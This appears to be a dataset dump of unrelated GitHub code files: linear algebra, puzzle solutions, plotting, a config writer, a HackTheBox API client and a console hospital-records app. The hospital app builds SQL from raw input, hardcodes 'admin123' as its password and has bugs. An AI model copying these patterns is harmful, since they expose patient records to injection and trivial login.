None:\n max_abs_rows = np.argmax(np.abs(u), axis=0)\n signs = np.sign(u[max_abs_rows, range(u.shape[1])])\n v = v * signs[:, np.newaxis]\n u = u * signs\n return u, v\n else:\n max_abs_rows = np.argmax(np.abs(u), axis=1)\n signs = np.sign(u[range(u.shape[0]), max_abs_rows])\n u = u * signs[:, np.newaxis]\n return u\n\n\ndef incremental_svd_rows(u, s, vt, B, k):\n cat_usb = np.concatenate([vt.T * s.reshape(1, -1), B.T], axis=1)\n Q, R = la.qr(cat_usb, mode='full')\n v_bar, s_bar, u_bar_t = la.svd(R)\n\n u_correction = np.zeros((u.shape[0] + B.shape[0], u.shape[1] + B.shape[0]))\n u_correction[:u.shape[0], :u.shape[1]] = u\n idxs_row = range(u .shape[0], u.shape[0] + B.shape[0])\n idxs_col = range(u.shape[1], u.shape[1] + B.shape[0])\n u_correction[idxs_row, idxs_col] = 1\n\n u_res = u_correction @ u_bar_t.T[:, :k]\n s_res = s_bar[:k]\n vt_res = v_bar.T[:k, :] @ Q.T\n\n u_res, vt_res = svd_sign_flip(u_res, vt_res)\n return u_res, s_res, vt_res\n","repo_name":"AntonioCarta/cannon","sub_path":"cannon/laes/skl.py","file_name":"skl.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"60"} +{"seq_id":"14405190955","text":"import sqlite3\nimport os\nimport getpass\nimport matplotlib.pyplot as plt\n\ncon= sqlite3.connect(\"Hospital.db\")\ntc=0\n\ndef illnessAnalysis():\n print(\"Illness Analysis and Summary \")\n print(\"--------------------------------------------------------\")\n q=\"select Illness,count(*) from Patient group by Illness \"\n cursor=con.execute(q)\n x=[]\n y=[]\n head=\"%20s %15s\"%(\"Illness\",\"Total\")\n print(head)\n print(\"--------------------------------------------------------\")\n for rec in cursor:\n x.append(rec[0])\n y.append(rec[1])\n r=\"%20s %15d\"%(rec[0],rec[1])\n print(r)\n print()\n plt.bar(x,y)\n plt.xlabel(\"Illness\")\n plt.ylabel(\"Patient Count\")\n plt.show()\n input(\"Press ENTER to return to Summary and Analysis Menu \")\n \ndef genderAnalysis():\n print(\"Gender Wise Patient Analysis \")\n print(\"------------------------------------------------------\")\n q=\"select Gender,count(*) from Patient group by Gender \"\n cursor=con.execute(q)\n x=[]\n y=[]\n head=\"%20s %15s\"%(\"Gender\",\"Total\")\n print(head)\n print(\"------------------------------------------------------\")\n for rec in cursor:\n x.append(rec[0])\n y.append(rec[1])\n r=\"%20s %15d\"%(rec[0],rec[1])\n print(r)\n print()\n plt.bar(x,y)\n plt.xlabel(\"Gender\")\n plt.ylabel(\"Patient Count\")\n plt.show()\n input(\"Press ENTER to return to Summary and Analysis Menu \")\n\ndef ageAnalysis():\n print(\"Age Wise Patient Analysis \")\n print(\"--------------------------------------------------------\")\n q=\"select Age,count(*) from Patient group by Age \"\n cursor=con.execute(q)\n x=[]\n y=[]\n head=\"%10s %15s\"%(\"Age\",\"Total\")\n print(head)\n print(\"--------------------------------------------------------\")\n for rec in cursor:\n x.append(rec[0])\n y.append(rec[1]) \n r=\"%10d %15d\"%(rec[0],rec[1])\n print(r)\n print()\n plt.bar(x,y)\n plt.xlabel(\"Age\")\n plt.ylabel(\"Patient Count\")\n plt.show()\n input(\"Press ENTER to return to Summary and Analysis Menu \")\n \ndef isPresent(pname):\n q=\"select * from Patient where Name='%s'\"%(pname)\n cursor=con.execute(q)\n s=cursor.fetchall()\n if len(s)==0:\n return False\n else:\n return True\n\n \nwhile True:\n os.system(\"cls\")\n print(\"--------------------------------------------------------------\")\n print(\"--------------------------------------------------------------\")\n print(\"WELCOME TO STAR HEALTH HOSPITAL \")\n print(\"--------------------------------------------------------------\")\n print(\"--------------------------------------------------------------\")\n print(\"There's nothing more important than your good health-- That's our capital asset :)\")\n print(\"--------------------------------------------------------------\")\n print(\"--------------------------------------------------------------\")\n print(\"1. Press '1' if you want to book an appointment \")\n print(\"2. Press '2' to see the list of all patients \")\n print(\"3. Press '3' to see the list of all doctors/nurse staff \")\n print(\"4. Press '4' for summary and analysis \")\n print(\"5. Press '5' to update details of any patient \")\n print(\"6. Exit \")\n print(\"--------------------------------------------------------------\")\n ch=int(input(\"Please enter your choice \"))\n\n if ch==1:\n os.system(\"cls\")\n print(\"BOOK AN APPOINTMENT\")\n print(\"-------------------\")\n\n pname=input(\"Enter Patient's Name : \")\n if isPresent(pname):\n print(\"Entered Patient already has an appointment \")\n \n input(\"Press ENTER to return to MAIN MENU \")\n continue\n \n age=int(input(\"Enter Patient's Age :\"))\n gen=input(\"Enter Patient's Gender :\")\n cno=input(\"Enter Contact Number :\")\n add=input(\"Enter Address :\")\n ill=input(\"Kindly enter the illness/disease or the reason to see the doctor :\")\n q=\"insert into Patient values('%s', %d, '%s', '%s', '%s', '%s')\"%(pname,age,gen,cno,add,ill)\n con.execute(q)\n con.commit()\n nc=con.total_changes \n n=nc-tc\n print(\"Appointment Booked \")\n input=(\"Press Enter to return to MAIN MENU \")\n tc=nc\n \n elif ch==2:\n os.system(\"cls\")\n uid=input(\"Admin ID: \")\n pwd=getpass.getpass()\n if uid==\"admin\" and pwd==\"admin123\":\n print(\"List of Patients \")\n print(\"-----------------------------------------------------------------------------------------------------------------------\")\n cursor=con.execute(\"Select * from Patient \")\n head=\"%20s %3s %6s %10s %20s %25s\"%(\"Patient's Name\",\"Age\",\"Gender\",\"Contact No.\",\"Address\",\"Illness\")\n print(head)\n print(\"-----------------------------------------------------------------------------------------------------------------------\")\n for rec in cursor:\n r=\"%20s %3d %6s %10s %20s %25s\"%(rec[0],rec[1],rec[2],rec[3],rec[4],rec[5])\n print(r)\n print(\"------------------------------------------------------------------------------------------------------------------------\")\n \n input(\"Press ENTER to return to MAIN MENU \")\n else:\n print(\"Incorrect Admin ID/Password \")\n print(\"----------------------------\")\n input(\"Press ENTER to return to MAIN MENU \")\n elif ch==3:\n os.system(\"cls\")\n print(\"Enter 'D' to see the list of Doctors \")\n print(\"Enter 'N' to see the list of Nurses \")\n ch1=input(\"Enter your choice \")\n if ch1=='D':\n print(\"List of Doctors \")\n print(\"--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\")\n cursor=con.execute(\"select * from Doctor \")\n head=\"%20s %20s %10s %20s %6s\"%(\"Doctor's Name\",\"Speciality\",\"Contact No.\",\"Appointment Hours\",\"Fees(in Rupees)\")\n print(head)\n print(\"--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\")\n for rec in cursor:\n r=\"%20s %20s %10s %20s %6s\"%(rec[0],rec[1],rec[2],rec[3],rec[4])\n print(r)\n print(\"--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\")\n \n input(\"Press ENTER to return MAIN MENU \") \n elif ch1=='N':\n print(\"List of Nurses \")\n print(\"-------------------------------------------------------------------------------------------------------------\")\n cursor=con.execute(\"select * from Nurse \")\n head=\"%20s %20s %15s\"%(\"Name\",\"Joined Since\",\"Working hours\")\n print(head)\n print(\"-------------------------------------------------------------------------------------------------------------\")\n for rec in cursor:\n r=\"%20s %20s %15s\"%(rec[0],rec[1],rec[2])\n print(r)\n print(\"-------------------------------------------------------------------------------------------------------------\")\n input(\"Press ENTER to return to MAIN MENU \")\n else:\n print(\"Invalid choice \")\n print(\"Kindly enter a valid choice \")\n \n elif ch==4:\n os.system(\"cls\")\n print(\"Summary and Analysis \")\n print(\"----------------------------------------\")\n uid=input(\"Admin ID: \")\n pwd=getpass.getpass()\n if uid==\"admin\" and pwd==\"admin123\":\n while True:\n os.system(\"cls\")\n print(\"1. Illness Analysis \")\n print(\"2. Gender Analysis \")\n print(\"3. Age Analysis \")\n print(\"4. Return to MAIN MENU \")\n print(\"----------------------------------------\")\n ch2=int(input(\"Enter your choice \"))\n if ch2==1:\n illnessAnalysis()\n elif ch2==2:\n genderAnalysis()\n elif ch2==3:\n ageAnalysis()\n elif ch2==4:\n break\n else:\n print(\"Invalid choice \")\n input(\"Press ENTER \")\n else:\n print(\"Incorrect Admin ID/Password \")\n print(\"----------------------------\")\n input(\"Press ENTER to return to MAIN MENU \") \n \n elif ch==5:\n os.system(\"cls\")\n uid=input(\"Admin ID: \")\n pwd=getpass.getpass()\n if uid==\"admin\" and pwd==\"admin123\":\n print(\"Update Patient Details\")\n print(\"--------------------------------------------------------------------------------------------------------------------------\")\n pname=input(\"Enter patient's name you want to update details of: \")\n if isPresent(pname): \n age=int(input(\"Enter Patient's Age :\"))\n gen=input(\"Enter Patient's Gender :\")\n cno=input(\"Enter Contact Number :\")\n add=input(\"Enter Address :\")\n ill=input(\"Kindly enter the illness/disease or the reason to see the doctor :\")\n q=\"update Patient set Age=%d,Gender='%s',ContactNo='%s'Address='%s',Illness='%s' where Name='%s' \"%(age,gen,cno,add,ill,pname)\n con.execute(q)\n con.commit()\n nc=con.total_changes\n n=nc-tc\n print(n,\"Details Updated \")\n print(\"--------------------------------------------------------------------------------------------------------------------------\")\n input(\"Press ENTER to return to MAIN MENU \")\n nc=tc\n else:\n print(\"Entered Patient is not present \")\n print(\"--------------------------------------------------------------------------------------------------------------------------\")\n input(\"Press ENTER to return to MAIN MENU \")\n else:\n print(\"Incorrect Admin ID/Password \")\n print(\"----------------------------\")\n input(\"Press ENTER to return to MAIN MENU \") \n\n elif ch==6:\n print(\"HAVE A GREAT DAY :)\")\n break\ncon.close() \n \n \n \n\n \n \n \n","repo_name":"Apurv-Chauhan/PYTHONPROJECT","sub_path":"HospitalProject.py","file_name":"HospitalProject.py","file_ext":"py","file_size_in_byte":11008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"71638135872","text":"import argparse\r\n\r\n\r\ndef parse_bliz_data(map_input):\r\n bliz_data = {'>': [], 'v': [], '<': [], '^': []}\r\n for r, row in enumerate(map_input):\r\n for c, char in enumerate(row):\r\n if char in bliz_data:\r\n bliz_data[char].append((r, c))\r\n return bliz_data\r\n\r\n\r\ndef move(src, des, bliz_data, max_r, max_c):\r\n pos = [src]\r\n i = 0\r\n while des not in pos:\r\n # print(i, len(pos), pos[-1])\r\n new_pos = []\r\n for bliz, bliz_pos in bliz_data.items():\r\n if bliz == '>':\r\n bliz_data[bliz] = [(r, c + 1) if c != max_c else (r, 1) for r, c in bliz_pos]\r\n if bliz == 'v':\r\n bliz_data[bliz] = [(r + 1, c) if r != max_r else (1, c) for r, c in bliz_pos]\r\n if bliz == '<':\r\n bliz_data[bliz] = [(r, c - 1) if c != 1 else (r, max_c) for r, c in bliz_pos]\r\n if bliz == '^':\r\n bliz_data[bliz] = [(r - 1, c) if r != 1 else (max_r, c) for r, c in bliz_pos]\r\n new_bliz_pos = bliz_data['>'] + bliz_data['v'] + bliz_data['<'] + bliz_data['^']\r\n for p_r, p_c in pos:\r\n next_pos = [\r\n (p_r - 1, p_c),\r\n (p_r + 1, p_c),\r\n (p_r, p_c - 1),\r\n (p_r, p_c + 1),\r\n (p_r, p_c)\r\n ]\r\n for pos_r, pos_c in next_pos:\r\n if 1 <= pos_r <= max_r and 1 <= pos_c <= max_c or (pos_r, pos_c) in [src, des]:\r\n if (pos_r, pos_c) not in new_bliz_pos + new_pos:\r\n new_pos.append((pos_r, pos_c))\r\n i += 1\r\n pos = new_pos\r\n return i\r\n\r\n\r\ndef part_1(input_string):\r\n map_input = list(map(list, input_string.split('\\n')[:-1]))\r\n bliz_data = parse_bliz_data(map_input)\r\n max_r = len(map_input) - 2\r\n max_c = len(map_input[0]) - 2\r\n src = (0, map_input[0].index('.'))\r\n des = (len(map_input) - 1, map_input[-1].index('.'))\r\n print(move(src, des, bliz_data, max_r, max_c))\r\n\r\n\r\ndef part_2(input_string):\r\n map_input = list(map(list, input_string.split('\\n')[:-1]))\r\n bliz_data = parse_bliz_data(map_input)\r\n max_r = len(map_input) - 2\r\n max_c = len(map_input[0]) - 2\r\n src = (0, map_input[0].index('.'))\r\n des = (len(map_input) - 1, map_input[-1].index('.'))\r\n i = move(src, des, bliz_data, max_r, max_c) + move(des, src, bliz_data, max_r, max_c) + move(src, des, bliz_data, max_r, max_c)\r\n print(i)\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"--part\",\r\n help=\"Specify puzzle 1 or puzzle 2 to be solved. Run both by default.\",\r\n required=False)\r\n args = parser.parse_args()\r\n file_input = open('Input_24.txt', 'r')\r\n input_string = file_input.read()\r\n file_input.close()\r\n\r\n if args.part == '1':\r\n part_1(input_string)\r\n elif args.part == '2':\r\n part_2(input_string)\r\n else:\r\n part_1(input_string)\r\n part_2(input_string)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n","repo_name":"DSW41923/AoC_DSW41923","sub_path":"2022/Day_24.py","file_name":"Day_24.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29874272606","text":"\n\n# ==============================\n# MCAR adhoc tests vs MNAR, MAR\n# ==============================\n\n# ======\n# Plots\n# ======\n\nimport ED\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.impute import SimpleImputer\nfrom scipy.stats import chi2_contingency\nfrom sklearn.preprocessing import OrdinalEncoder\nimport numpy as np\nimport logging\n\n# ---------------------------------------------------------Charts Class-----------------------------------------------------\n\n\nclass Charts(Base):\n\n\tdef Categorical_missingness_Crosstab_Plot(independent, target):\n\t \n\t '''Plot cross tab'''\n\t \n\t missingness = independent.isnull()\n\t cross_tab = pd.crosstab(target, missingness, normalize=\"columns\", dropna=True).apply(lambda r: round(r,2), axis=1)\n\n\t ax = cross_tab.plot(kind='bar', width=0.15, ylabel=\"Number Absorbed\",color=[\"#003A5D\",\"#A19958\"]\\\n\t ,edgecolor=\"tab:grey\",linewidth=1.5)\n\n\t l = {\"Not-Absorbed\":\"#003A5D\", \"Absorbed\":\"#A19958\"}\n\t labels = list(l.keys())\n\t handles = [plt.Rectangle((5,5),10,10, color=l[label]) for label in labels]\n\t plt.legend(handles, labels, fontsize=7, bbox_to_anchor=(1.13,1.17), loc=\"upper left\", title=\"legend\",shadow=True)\n\n\t plt.title(\"Number Absorbed for each Gender\", fontsize=9, pad=12)\n\t plt.xlabel(\"Gender\",fontsize=7.5)\n\t plt.xticks(fontsize=7.5)\n\t plt.ylabel('Number Absorbed', fontsize = 7.5)\n\t plt.yticks(fontsize=7.5)\n\t plt.rcParams[\"figure.figsize\"] = (2.7,2.5)\n\t plt.rcParams[\"legend.title_fontsize\"] = 7\n\n\t for pos in [\"right\", \"top\"]:\n\t plt.gca().spines[pos].set_visible(False)\n\t \n\t for c in ax.containers:\n\t ax.bar_label(c, label_type='edge', fontsize=7)\n\t \n\t return cross_tab\n\n\n\tdef Categorical_missingness_Pivot_Plot(independent, target):\n\t \n\t '''Categorical Plot for greater than 2 categories'''\n\t \n\t missingness = independent.isnull()\n\t df = pd.concat([missingness, target], axis=1) \n\t df_pivot = pd.pivot_table(df, index=independent.name, values=target.name, aggfunc=len, fill_value=0)\\\n\t #.apply(lambda x: x/float(x.sum()))\n\n\t d = df_pivot.plot(kind=\"bar\", width=0.1, color=[\"#003A5D\",\"#A19958\"], fontsize=7.5\\\n\t , edgecolor=\"tab:grey\",linewidth=1.5)\n\n\t d.legend(title=\"legend\", bbox_to_anchor=(1, 1.02), loc='upper left', fontsize=6.5, shadow=True)\n\t \n\t plt.title(\"Race and Absorption for Gender\", fontsize=7.5, pad=12)\n\t plt.xlabel('Absorbed', fontsize=7)\n\t plt.xticks(fontsize=7)\n\t plt.ylabel('Number Absorbed', fontsize = 7)\n\t plt.yticks(fontsize=7)\n\t plt.xlabel(\" \")\n\t plt.rcParams[\"figure.figsize\"] = (2.7,2.5)\n\t plt.rcParams[\"legend.title_fontsize\"] = 7\n\n\t for pos in [\"right\", \"top\"]:\n\t plt.gca().spines[pos].set_visible(False)\n\n\n\t return df_pivot\n\n\n\tdef Categorical_Crosstab_Plot(independent, target):\n\t \n\t ''' Plot cross tab '''\n\n\t h = pd.crosstab(target,independent, normalize=\"columns\")\n\t bar = plt.bar(target, independent)\n\t return plt.show(), h\n\n\n\tdef Categorical_Pivot_Plot(independent, target):\n\t \n\t '''Categorical Plot for greater than 2 categories'''\n\t \n\t df = pd.concat([independent, target], axis=1) \n\t df_pivot = pd.pivot_table(df, index=independent.name, columns=target.name, aggfunc=len, fill_value=0)\\\n\t .apply(lambda x: x/float(x.sum()))\n\t \n\t return df_pivot.plot(kind=\"bar\"), df_pivot\n\n\n\tdef Scatter_Plot(independent, target):\n\t \n\t '''Scatter plot between numerical variables'''\n\t \n\t scatter = plt.scatter(target, independent)\n\t return plt.show() \n\n\tdef Correlation_Plot(dataframe):\n\t \n\t '''Independent variables correlation plot'''\n\n\t return dataframe.corr()\n\n\tdef Point_Biserial_Plot(independent, target):\n\t \n\t sns.set_theme(style=\"ticks\", color_codes = True)\n\t data = pd.concat([independent, target], axis=1)\n\t \n\t return sns.catplot(x = independent, y = target, kind=\"box\", data = data) ","repo_name":"Humbulani1234/Streamlit","sub_path":"class_plotting.py","file_name":"class_plotting.py","file_ext":"py","file_size_in_byte":4051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1226856840","text":"import sys\r\n\r\nn, m, *ab = map(int, sys.stdin.read().split())\r\ngraph = [[] for _ in range(n)]\r\nfor a, b in zip(*[iter(ab)] * 2):\r\n a -= 1\r\n b -= 1\r\n graph[a].append(b)\r\n graph[b].append(a)\r\n\r\n\r\ndef main():\r\n stack = [(0, 0)]\r\n paths = 0\r\n while stack:\r\n i, visited = stack.pop()\r\n visited |= 1 << i\r\n if visited == (1 << n) - 1:\r\n paths += 1\r\n continue\r\n for j in graph[i]:\r\n if visited >> j & 1:\r\n continue\r\n stack.append((j, visited))\r\n print(paths)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"kagemeka/atcoder-submissions","sub_path":"jp.atcoder/abc054/abc054_c/11884904.py","file_name":"11884904.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"37106840709","text":"import configparser\nimport os\n\nclass Config(object):\n def __init__(self, config_file='config.ini'):\n self.config_file = config_file\n self.config = configparser.ConfigParser()\n try:\n self.config.read(config_file)\n except Exception as e:\n err = 'config file is corrupted.\\n{0}'.format(e)\n raise SystemExit(err)\n\n def set(self, section, option, envvar):\n if os.getenv(envvar):\n if section != 'DEFAULT' and not self.config.has_section(section):\n self.config.add_section(section)\n self.config.set(section, option, os.getenv(envvar))\n\n def stor(self):\n try:\n with open(self.config_file, 'w') as configfile:\n self.config.write(configfile)\n except Exception as e:\n err = 'cannot write in config file.\\n{0}'.format(e)\n raise SystemExit(err)\n\nif __name__ == '__main__':\n config = Config('/var/lib/supysonic/.supysonic')\n config.set('base', 'database_uri', 'SUPYSONIC_DB_URI')\n config.set('base', 'scanner_extensions', 'SUPYSONIC_SCANNER_EXTENSIONS')\n config.set('base', 'secret_key', 'SUPYSONIC_SECRET_KEY')\n config.set('webapp', 'cache_dir', 'SUPYSONIC_WEBAPP_CACHE_DIR')\n config.set('webapp', 'log_file', 'SUPYSONIC_WEBAPP_LOG_FILE')\n config.set('webapp', 'log_level', 'SUPYSONIC_WEBAPP_LOG_LEVEL')\n config.set('daemon', 'socket', 'SUPYSONIC_DAEMON_SOCKET')\n config.set('daemon', 'log_file', 'SUPYSONIC_DAEMON_LOG_FILE')\n config.set('daemon', 'log_level', 'SUPYSONIC_DAEMON_LOG_LEVEL')\n config.set('lastfm', 'api_key', 'SUPYSONIC_LASTFM_API_KEY')\n config.set('lastfm', 'secret', 'SUPYSONIC_LASTFM_SECRET')\n config.stor()\n","repo_name":"ogarcia/docker-supysonic","sub_path":".circleci/configure.py","file_name":"configure.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"15711320452","text":"#!/usr/bin/python3\n#coding:utf-8\n\n#Autor: xaxxjs (https://sergioab7.github.io/index.html)\n\n#Thanks to (sw1tch-bl4d3) (https://gitlab.com/sw1tchbl4d3) for the API\n\nfrom bs4 import BeautifulSoup\n\nfrom challenges import challenges\nfrom machines import machines\nfrom social import social\n\nimport re\n\nfrom htbapi.core import getRequest, rawPostSSL\n\n\nfrom beautifultable import BeautifulTable\nfrom colorama import Fore, Back, Style\nimport signal\nfrom time import sleep\nimport signal\nimport json\nimport warnings\nimport os, sys\nwarnings.filterwarnings(\"ignore\")\n\ndef signal_handler(key,frame):\n print(Fore.YELLOW + \"\\n[*]\" + Fore.RESET + \"[!] Saliendo... \\n\")\n print(Style.RESET_ALL)\n sys.exit(1)\n\nsignal=signal.signal(signal.SIGINT,signal_handler)\n\n\nbanner=Fore.GREEN + \"\"\"\n __ __ __ __ __ \n / /_ ____ _ __/ /_/ /_ ___ / /_ ____ ______/ /__\n / __ \\/ __ \\| |/_/ __/ __ \\/ _ \\/ __ \\/ __ `/ ___/ //_/\n / /_/ / /_/ /> >\" + Fore.RESET)\n while(len(comando)<50):\n comando=input(Fore.BLUE + \"INSERTA TU API>>\" + Fore.RESET)\n print(Fore.YELLOW + \"\\n\\t\\t[API AGREGADA CON ÉXITO]\" + Fore.RESET)\n print(Fore.YELLOW + \"\\n\\t\\tReinicia el servicio para que se apliquen los cambios\\n\\n\" + Fore.RESET)\n f.write(comando)\n f.close()\n sys.exit()\n\nif(os.path.isfile(\"api.txt\")):\n with open(\"api.txt\", \"r\") as app:\n API = app.read()\n app.close()\nelse:\n api()\n\nos.system(\"clear\")\nprint(banner)\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\ndef comandos_general():\n print(\"\"\"\n \"\"\"+ bcolors.FAIL +\"[+]\"+bcolors.ENDC + \"\"\" Maquina\n \"\"\"+ bcolors.FAIL +\"[+]\"+bcolors.ENDC + \"\"\" Social\n \"\"\"+ bcolors.FAIL +\"[+]\"+bcolors.ENDC + \"\"\" Challenges\n\n \"\"\"+ bcolors.WARNING +\"[+]\"+bcolors.ENDC + \"\"\" Clear \n \"\"\"+ bcolors.WARNING +\"[+]\"+bcolors.ENDC + \"\"\" Exit \n \"\"\"+ bcolors.WARNING +\"[+]\"+bcolors.ENDC + \"\"\" Help\n \"\"\")\n\ncomandos_general()\n\n\n\ndef comandos_maquina():\n print(\"\"\"\n \"\"\"+ bcolors.HEADER +\"\\n\\t\\t[INFORMACIÓN]\" + bcolors.ENDC + \"\"\" \n \"\"\"+ bcolors.FAIL +\"[1]\"+bcolors.ENDC + \"\"\" Mostrar todas las máquinas. \n \"\"\"+ bcolors.FAIL +\"[2]\"+bcolors.ENDC + \"\"\" Mostrar todas las máquinas activas.\n \"\"\"+ bcolors.FAIL +\"[3]\"+bcolors.ENDC + \"\"\" Mostrar todas las máquinas retiradas.\n \"\"\"+ bcolors.HEADER +\"\\n\\t\\t[INTERACCIÓN]\" + bcolors.ENDC + \"\"\" \n \"\"\"+ bcolors.FAIL +\"[4]\"+bcolors.ENDC + \"\"\" Inserta la flag (user/root).\n \"\"\"+ bcolors.FAIL +\"[5]\"+bcolors.ENDC + \"\"\" Resetea la máquina.\n \"\"\"+ bcolors.FAIL +\"[6]\"+bcolors.ENDC + \"\"\" Asigna una máquina.\n \"\"\"+ bcolors.FAIL +\"[7]\"+bcolors.ENDC + \"\"\" Extiende el tiempo de la máquina.\n \"\"\"+ bcolors.FAIL +\"[8]\"+bcolors.ENDC + \"\"\" Para la máquina.\n\n \"\"\"+ bcolors.WARNING +\"[+]\"+bcolors.ENDC + \"\"\" Back\n \"\"\"+ bcolors.WARNING +\"[+]\"+bcolors.ENDC + \"\"\" Clear \n \"\"\"+ bcolors.WARNING +\"[+]\"+bcolors.ENDC + \"\"\" Help\n \"\"\")\n\ndef mostrar_todas_las_maquinas():\n try:\n table=BeautifulTable()\n table.set_style(BeautifulTable.STYLE_GRID)\n test=table.columns.header=[Fore.CYAN+\"MÁQUINA\"+Fore.RESET,Fore.CYAN+\"S.O\"+Fore.RESET,Fore.CYAN+\"IP\"+Fore.RESET,Fore.CYAN+\"Puntos\"+Fore.RESET,Fore.CYAN+\"USER OWN\"+Fore.RESET,Fore.CYAN+\"ROOT OWN\"+Fore.RESET,Fore.CYAN+\"RATING\"+Fore.RESET,Fore.CYAN+\"BY\"+Fore.RESET]\n for i in machines.getAllMachines(API):\n table.append_row([f\"{i['name']}\", f\"{i['os']}\", f\"{i['ip']}\", f\"{i['points']}\", f\"{i['user_owns']}\", f\"{i['root_owns']}\", f\"{i['rating']}\", f\"{i['maker']['name']}\"])\n for i in test:\n table.left_padding_widths[i]=1\n table.right_padding_widths[i]=1\n print(table)\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n\ndef mostrando_maquinas_activas():\n try:\n activemachines = []\n allmachines = machines.getAllMachines(API)\n for machine in allmachines:\n if machine[\"retired\"] == False:\n activemachines.append(machine)\n table=BeautifulTable()\n table.set_style(BeautifulTable.STYLE_GRID)\n test=table.columns.header=[Fore.CYAN+\"MÁQUINA\"+Fore.RESET,Fore.CYAN+\"S.O\"+Fore.RESET,Fore.CYAN+\"IP\"+Fore.RESET,Fore.CYAN+\"Puntos\"+Fore.RESET,Fore.CYAN+\"USER OWN\"+Fore.RESET,Fore.CYAN+\"ROOT OWN\"+Fore.RESET,Fore.CYAN+\"RATING\"+Fore.RESET,Fore.CYAN+\"BY\"+Fore.RESET]\n for i in activemachines:\n table.append_row([f\"{i['name']}\", f\"{i['os']}\", f\"{i['ip']}\", f\"{i['points']}\", f\"{i['user_owns']}\", f\"{i['root_owns']}\", f\"{i['rating']}\", f\"{i['maker']['name']}\"])\n for i in test:\n table.left_padding_widths[i]=1\n table.right_padding_widths[i]=1\n print(table)\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n \n\ndef mostrando_maquinas_retiradas():\n try:\n retiredmachines = []\n allmachines = machines.getAllMachines(API)\n for machine in allmachines:\n if machine[\"retired\"] == True:\n retiredmachines.append(machine)\n table=BeautifulTable()\n table.set_style(BeautifulTable.STYLE_GRID)\n test=table.columns.header=[Fore.CYAN+\"MÁQUINA\"+Fore.RESET,Fore.CYAN+\"S.O\"+Fore.RESET,Fore.CYAN+\"IP\"+Fore.RESET,Fore.CYAN+\"Puntos\"+Fore.RESET,Fore.CYAN+\"USER OWN\"+Fore.RESET,Fore.CYAN+\"ROOT OWN\"+Fore.RESET,Fore.CYAN+\"RATING\"+Fore.RESET,Fore.CYAN+\"BY\"+Fore.RESET]\n for i in retiredmachines:\n table.append_row([f\"{i['name']}\", f\"{i['os']}\", f\"{i['ip']}\", f\"{i['points']}\", f\"{i['user_owns']}\", f\"{i['root_owns']}\", f\"{i['rating']}\", f\"{i['maker']['name']}\"])\n for i in test:\n table.left_padding_widths[i]=1\n table.right_padding_widths[i]=1\n print(table)\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n\ndef conversor_id(maquina):\n try:\n maquina = maquina.lower()\n maquina = maquina.capitalize()\n maquina_id=\"\"\n for i in machines.getAllMachines(API):\n if(i['name']==maquina):\n maquina_id = i['id']\n return maquina_id\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n\ndef inserta_flag(maquina_htb):\n try:\n machine_id=conversor_id(maquina_htb)\n flag=input(Fore.YELLOW + \"\\t[+]\"+ Fore.RESET + \"Inserta la flag(user/root) >>\")\n dificultad=int(input(Fore.YELLOW + \"\\t[+]\"+Fore.RESET + \"Inserta la dificultad (1-10) >>\"))\n resultado=machines.ownMachine(machine_id, API, flag,dificultad)\n if(resultado==\"success\"):\n print(Fore.GREEN + \"\\n\\t[+] SUCCESS!\" +Fore.RESET)\n elif(resultado==\"flag_invalid\"):\n print(Fore.RED + \"\\n\\t[+] FLAG INVÁLIDA\" +Fore.RESET)\n elif(resultado==\"failed\"):\n print(Fore.RED + \"\\n\\t[+] SUCCESS! \" +Fore.RESET)\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n\ndef resetea_maquina(maquina_htb):\n try:\n machine_id=conversor_id(maquina_htb)\n resultado=machines.resetMachine(machine_id, API)\n print(Fore.GREEN + \"[+] Máquina reseteada con éxito.\"+Fore.RESET)\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n \ndef asignar_maquina(maquina_htb):\n try:\n machine_id=conversor_id(maquina_htb)\n resultado=machines.assignMachine(machine_id, API)\n if(resultado==\"success\"):\n print(Fore.GREEN + \"\\n\\t[+] MAQUINA ASIGNADA!\" +Fore.RESET)\n elif(resultado==\"already_have_machiine\"):\n print(Fore.RED + \"\\n\\t[+] YA TIENES LA MAQUINA EN USO!\" +Fore.RESET)\n elif(resultado==\"no_vip\"):\n print(Fore.RED + \"\\n\\t[+] MAQUINA INCORRECTA!\" +Fore.RESET)\n elif(resultado==\"failed\"):\n print(Fore.GREEN + \"\\n\\t[+] MAQUINA ASIGNADA!\" +Fore.RESET)\n except Exception as e:\n print(Fore.RED + \"Error: %s\"%(e) + Fore.RESET)\n\ndef parar_maquina(maquina_htb):\n machine_id=conversor_id(maquina_htb)\n response=machines.stopMachine(machine_id,API)\n print(Fore.GREEN + \"\\n\\t[+] SUCCESS!\" +Fore.RESET)\n\ndef 